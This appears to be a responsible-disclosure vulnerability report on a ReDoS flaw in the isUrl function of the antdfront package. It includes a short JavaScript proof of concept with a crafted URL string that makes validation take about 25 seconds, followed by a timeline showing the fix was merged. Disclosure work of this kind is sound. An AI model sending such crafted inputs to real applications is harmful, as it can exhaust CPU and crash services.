Inefficient Regular Expression Complexity in x-neuron/antdfront

Valid

Reported on

Sep 2nd 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the antdFront package. An attacker that is able to provide crafted input to the isUrl(input) function may cause an application to consume an excessive amount of CPU.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs

// PoC.mjs
import {isUrl } from './antdFront/src/utils/is.js';
var time = Date.now();
isUrl('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost+" ms")

Execute the following command in another terminal:

git clone and make changes like setting "type": "module" in the package.json
node poc.mjs

Check the Output:

Time taken to validate : 25051 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it's 25 sec.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 9 months ago
ready-research submitted a
9 months ago
We have contacted a member of the x-neuron/antdfront team and are waiting to hear back 7 months ago
We have sent a second follow up to the x-neuron/antdfront team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the x-neuron/antdfront team. This report is now considered stale. 7 months ago
50岁的星空 validated this vulnerability 12 days ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
50岁的星空 confirmed that a fix has been merged on ab135d 12 days ago
ready-research has been awarded the fix bounty
to join this conversation